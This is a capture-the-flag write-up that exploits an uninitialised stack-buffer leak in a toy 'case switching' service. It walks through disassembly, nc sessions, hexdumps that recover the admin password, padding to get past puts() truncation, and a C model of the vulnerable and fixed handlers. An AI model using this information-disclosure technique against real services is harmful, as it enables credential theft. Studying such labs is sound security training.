CTF Tasks 1 & 3

We are presented with two binaries (caseservice for task 1, caseservice_reload for task 3) that do almost the same thing. Let's see exactly what:

Task 1

# ./caseservice pass 4242
Server-side debug: login password is set to [example]
 
.... in another terminal:
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
 
1
You selected [1]
Input: input size and then <size> bytes
10         
Bla bla bla
Here you go:
bLABLABL
 
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
 
2
You selected [2]
Configuration is done through a shell
What is the administrator password?
password
Unauthorized login attempted.

So, as the name implies, it switches the case of the input. How does it do that? We turn to the assembly of the function named handle_use, where we find this loop:

   0x08048e16 <+116>:	mov    DWORD PTR [ebp-0xc],0x0
   0x08048e1d <+123>:	jmp    0x8048e41 <handle_use+159>
   0x08048e1f <+125>:	lea    edx,[ebp-0x4c6]
   0x08048e25 <+131>:	mov    eax,DWORD PTR [ebp-0xc]
   0x08048e28 <+134>:	add    eax,edx
   0x08048e2a <+136>:	movzx  eax,BYTE PTR [eax]
   0x08048e2d <+139>:	xor    eax,0x20
   0x08048e30 <+142>:	lea    ecx,[ebp-0x4c6]
   0x08048e36 <+148>:	mov    edx,DWORD PTR [ebp-0xc]
   0x08048e39 <+151>:	add    edx,ecx
   0x08048e3b <+153>:	mov    BYTE PTR [edx],al
   0x08048e3d <+155>:	add    DWORD PTR [ebp-0xc],0x1
   0x08048e41 <+159>:	mov    eax,DWORD PTR [ebp-0x4cc]
   0x08048e47 <+165>:	cmp    DWORD PTR [ebp-0xc],eax
   0x08048e4a <+168>:	jb     0x8048e1f <handle_use+125>

So it XORs every byte of the input with 0x20, regardless of whether the byte is a letter, a digit or a symbol (for ASCII letters that flips the case; for anything else it just flips bit 5). Two details matter: the loop counter is compared against the value at [ebp-0xc4cc], which is the size we typed rather than the number of bytes the service actually received, and the buffer at [ebp-0x4c6] lives on the stack. So why does it need to know the input size at all, and what happens if we declare more bytes than we send? Let's fiddle with it:

# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
 
1
You selected [1]
Input: input size and then <size> bytes
10
A
Here you go:
....... (binary)

Interesting: we declared 10 bytes, sent 1, and got back binary data that is not ours. The extra bytes are whatever was already sitting in the stack buffer. Maybe there's something useful in there. Let's redirect to a file and ask for 255 bytes:

# nc 127.0.0.1 4242 > out
1
255
 
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
00000130  f9 97 ec c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..     0  !   t.|
00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
000001d0  24 28 28 e0 24 28 27 20  20 20 74 c9 df 9f 27 20  |$((.$('   t...' |
000001e0  20 20 20 20 20 20 e3 69  bc 07 09 53 2a 5f a0 5e  |      .i...S*_.^|
000001f0  db a6 56 89 0d eb 4f aa  1f af 45 58 41 4d 50 4c  |..V...O...EXAMPL|
00000200  45 20 20 08 08 08 08 08  08 08 08 08 08 08 08 08  |E  .............|
00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
00000220  a1 a1 a1                                          |...|
00000223

There's our password with the case switched: "example" shows up as "EXAMPLE" at offset 0x1fa, every byte XORed with 0x20. Let's try the same thing on the remote system.

# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
00000130  f9 97 ec c8 df 9f 40 20  20 20 2c 20 20 20 30 8a  |......@   ,   0.|
00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..     0  !   t.|
00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
000001d0  24 28 28 e0 24 28 2c 20  20 20 74 c9 df 9f 27 20  |$((.$(,   t...' |
000001e0  20 20 20 20 20 20 68 0e  5b fd 7b 7d 73 03 bc ac  |      h.[.{}s...|
000001f0  0a 3f 60 6f 4e 46 f9 c7  85 57 49 4e 54 45 4c 4c  |.?`oNF...WINTELL|
00000200  49 47 45 4e 43 45 20 20  08 08 08 08 08 08 08 08  |IGENCE  ........|
00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
00000220  a1 a1 a1                                          |...|
00000223

So the password seems to be "wintelligence", but note that "EXAMPLE" in the first dump started at offset 0x1fa. At 0x1fa in the second dump is the "I" of "INTELLIGENCE", so the preceding "W" is just an adjacent stack byte. Trying "intelligence" works and we are able to log in.

Task 3

This task is supposedly more secure. Let's see just how secure by doing almost the same thing as before and looking at the hexdump.

# nc 127.0.0.1 4242 > out
1
255
 
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a df af 1f  aa 4f a0 df 9a 97 74 8e  |go:.*....O....t.|
00000130  f4 97 20 e0 24 28 20 30  22 20 48 e1 24 28 0d cc  |.. .$( 0" H.$(..|
00000140  e1 97 68 98 f4 97 20 20  20 20 68 c9 df 9f e9 13  |..h...    h.....|
00000150  f9 97 fc c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
00000160  e1 97 20 20 20 20 e0 cf  df 97 20 d9 df 97 20 20  |..    .... ...  |
00000170  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 31 20  |  .."  0  &q..1 |
00000180  20 20 20 90 dd 97 20 30  20 20 21 20 20 20 74 8e  |   ... 0  !   t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 ae 9a  |..(.$(        ..|
000001a0  e1 97 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |..(.$(        t.|
000001b0  f4 97 28 e0 24 28 20 20  20 20 58 cd df 9f 5c f3  |..(.$(    X...\.|
000001c0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001d0  20 20 58 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  X...P...    t.|
000001e0  f4 97 20 20 20 20 20 20  20 20 58 cd df 9f 1d ad  |..        X.....|
000001f0  24 28 28 e0 24 28 27 20  20 20 50 c9 df 9f 68 20  |$((.$('   P...h |
00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
00000210  01 0a                                             |..|
00000212

So even though we ask for 255 bytes, it returns considerably fewer (0x212 - 0x124 = 238, including the trailing newline). Why is that? In task 1, handle_use ended like this:

   0x08048e47 <+165>:	cmp    DWORD PTR [ebp-0xc],eax
   0x08048e4a <+168>:	jb     0x8048e1f <handle_use+125>
   0x08048e4c <+170>:	mov    eax,DWORD PTR [ebp-0x4cc]
   0x08048e52 <+176>:	mov    DWORD PTR [esp+0x8],eax
   0x08048e56 <+180>:	lea    eax,[ebp-0x4c6]
   0x08048e5c <+186>:	mov    DWORD PTR [esp+0x4],eax
   0x08048e60 <+190>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048e63 <+193>:	mov    DWORD PTR [esp],eax
   0x08048e66 <+196>:	call   0x8048ab0 <write@plt>
   0x08048e6b <+201>:	leave  
   0x08048e6c <+202>:	ret  

Task 3 ends like this:

   0x08048de6 <+162>:	cmp    DWORD PTR [ebp-0xc],eax
   0x08048de9 <+165>:	jb     0x8048dbe <handle_use+122>
   0x08048deb <+167>:	lea    eax,[ebp-0x4c6]
   0x08048df1 <+173>:	mov    DWORD PTR [esp],eax
   0x08048df4 <+176>:	call   0x80489f0 <puts@plt>
   0x08048df9 <+181>:	leave  
   0x08048dfa <+182>:	ret

So instead of write(fd, buf, size) it calls puts(buf), which prints up to the first NUL byte and then a newline. The XOR loop still runs over all size bytes, so the stale data is still in the buffer; puts merely stops at the first zero. Note what the XOR does to zeros: a NUL inside the first size bytes becomes 0x20 (that is where all the spaces in the dumps come from) and a stale 0x20 becomes a NUL. We can get around the truncation by sending exactly enough input to overwrite the offending NUL with a non-zero byte: our "a"s come out as "A"s, followed by whatever sits behind them up to the next NUL.
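To make the two endings concrete, here is a C model of the handler reconstructed from the disassembly above. This is an example added for this write-up, not the challenge's source: the socket is replaced by in-memory buffers and the stack buffer by a frame array that arrives pre-filled with stale data, so it runs stand-alone. FRAME_LEN, the declared size of 60, the stale 0x20 at offset 30 and the secret at offset 50 are constructed for the demo. Next to the task-1 (write) and task-3 (puts) variants is a fixed version that bounds both the loop and the output by the number of bytes actually read:

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define XOR_KEY   0x20
#define FRAME_LEN 256   /* stand-in for the stack buffer at [ebp-0x4c6]; its real size is not known */

/* `frame` stands in for the stack buffer and arrives pre-filled with whatever earlier code left
 * there; `in`/`in_len` is what read() delivered; `size` is the client-declared length; `out` stands
 * in for the socket.  Each handler returns the number of bytes "sent". */
typedef size_t handler_fn(unsigned char *frame, const unsigned char *in, size_t in_len,
                          size_t size, unsigned char *out);

/* Task 1: the XOR loop and write() both trust `size`, so bytes never filled by read() go out too. */
size_t handle_use_write(unsigned char *frame, const unsigned char *in, size_t in_len,
                        size_t size, unsigned char *out)
{
    if (size > FRAME_LEN) size = FRAME_LEN;          /* assumed upper bound (the page tops out at 255) */
    size_t got = in_len < size ? in_len : size;      /* read() returns at most `size` bytes */
    memcpy(frame, in, got);
    for (size_t i = 0; i < size; i++)                /* bug: bound is `size`, not `got` */
        frame[i] ^= XOR_KEY;
    memcpy(out, frame, size);                        /* bug: write(fd, buf, size) */
    return size;
}

/* Task 3: same loop, then puts(buf).  Output stops at the first NUL, but a NUL inside the first
 * `size` bytes was turned into 0x20 by the loop, and any NUL the client can reach with padding is
 * simply overwritten.  The leak is shortened, not removed. */
size_t handle_use_puts(unsigned char *frame, const unsigned char *in, size_t in_len,
                       size_t size, unsigned char *out)
{
    if (size > FRAME_LEN) size = FRAME_LEN;
    size_t got = in_len < size ? in_len : size;
    memcpy(frame, in, got);
    for (size_t i = 0; i < size; i++)
        frame[i] ^= XOR_KEY;
    size_t n = 0;
    while (n < FRAME_LEN && frame[n] != 0)           /* puts() scans for the terminator */
        n++;
    memcpy(out, frame, n);
    out[n] = '\n';
    return n + 1;
}

/* Fixed: every bound is the number of bytes actually received. */
size_t handle_use_fixed(unsigned char *frame, const unsigned char *in, size_t in_len,
                        size_t size, unsigned char *out)
{
    if (size > FRAME_LEN) size = FRAME_LEN;
    size_t got = in_len < size ? in_len : size;
    memcpy(frame, in, got);
    for (size_t i = 0; i < got; i++)
        frame[i] ^= XOR_KEY;
    memcpy(out, frame, got);
    return got;
}

/* Does `needle` occur in `hay`?  (strstr would stop at an embedded NUL.) */
static int contains(const unsigned char *hay, size_t hay_len, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + n <= hay_len; i++)
        if (memcmp(hay + i, needle, n) == 0) return 1;
    return 0;
}

/* Constructed scenario: a stale lowercase secret sits at frame offset 50 and a stale 0x20 at
 * offset 30 (which the XOR loop turns into a NUL).  The client declares size 60 but sends only
 * `in_len` bytes of 'A'.  Returns 1 if the case-switched secret ("EXAMPLE") reaches the client. */
int secret_leaks(handler_fn *handler, size_t in_len)
{
    unsigned char frame[FRAME_LEN] = {0};
    unsigned char in[FRAME_LEN], out[FRAME_LEN + 1];
    frame[30] = 0x20;
    memcpy(frame + 50, "example", 7);
    memset(in, 'A', sizeof in);
    size_t sent = handler(frame, in, in_len, 60, out);
    return contains(out, sent, "EXAMPLE");
}

int main(void)
{
    printf("write, 1 byte sent  : leak=%d\n", secret_leaks(handle_use_write, 1));
    printf("puts,  1 byte sent  : leak=%d\n", secret_leaks(handle_use_puts, 1));
    printf("puts,  31 bytes sent: leak=%d\n", secret_leaks(handle_use_puts, 31));
    printf("fixed, 31 bytes sent: leak=%d\n", secret_leaks(handle_use_fixed, 31));
    return 0;
}
```

With one byte sent, the write variant leaks the secret outright, the puts variant stops at the NUL that the XOR made out of the stale 0x20 at offset 30, and 31 bytes of padding are enough to push the puts variant past it, which is the padding game played below. The fixed variant never returns more than it received.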

Let's try 210 bytes of padding (still declaring a size of 255):

# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 2a 20  20 20 50 c9 df 9f 68 20  |AAAAAA*   P...h |
00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
00000210  01 0a                                             |..|
00000212

After our 210 "A"s there are 27 more non-NUL bytes (0x1f6 to 0x210) before puts stopped, so the NUL sits at offset 237 of the buffer and 210 + 2 + 8 + 8 + 8 + 2 = 238 bytes of padding will overwrite it. So we try 238 bytes:

# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000210  41 41 2a 69 bc 07 09 53  2a 5f a0 5e db a6 56 89  |AA*i...S*_.^..V.|
00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|
0000022a

After the 238 "A"s there are 23 more non-NUL bytes (0x212 to 0x228), so the next NUL is at offset 261 and getting past it would take 238 + 6 + 8 + 8 + 2 = 262 bytes, more than the 255 we can ask for. Before digging into the assembly, let's do some dynamic analysis:

# ltrace ./caseservice_reload pass 4242
__libc_start_main(0x8048fab, 3, 0xbfffee84, 0x80491d0 <unfinished ...>
fopen("pass", "r")                                        = 0x804c008
fgets("example\n", 1000, 0x804c008)                       = 0xbfffe988
strlen("example\n")                                       = 8
printf("Server-side debug: login passwor"..., "example")  = 54
Server-side debug: login password is set to [example]
SHA1(0xbfffe988, 7, 0xbfffe970, 72)                       = 0xbfffe970
fclose(0x804c008)                                         = 0
atoi(0xbffff079, 0, 0x2cb4304e, 1)                        = 4242
socket(2, 1, 0)                                           = 3
bzero(0xbfffedb8, 16)                                     = <void>
inet_addr("000.0.0.0")                                    = 0
htons(4242, 16, 0, 1)                                     = 0x9210
setsockopt(3, 1, 2, 0xbfffedcc)                           = 0
bind(3, 0xbfffedb8, 16, 0xbfffedcc)                       = 0
listen(3, 5, 16, 0xbfffedcc)                              = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc)             = 4
fork()                                                    = 18145
close(4)                                                  = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc <no return ...>
--- SIGCHLD (Child exited) ---

Notice the SHA1 call: the 7 bytes of "example" at 0xbfffe988 are hashed at startup and the digest is written to 0xbfffe970. If we look into handle_configure we see that the comparison (memcmp) is done against the SHA1 of our input as well. Since the SHA1 of the correct password is computed once at program start, the digest may still be lying around on the stack. Let's check the hash of "example":

# echo -n "example" | sha1sum 
c3499c2729730a7f807efb8676a92dcb6f8a3f8f  -

Looking for the start of the hash (c3 49 9c ...), there is nothing like it in our hexdump. But the end is there:

00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|

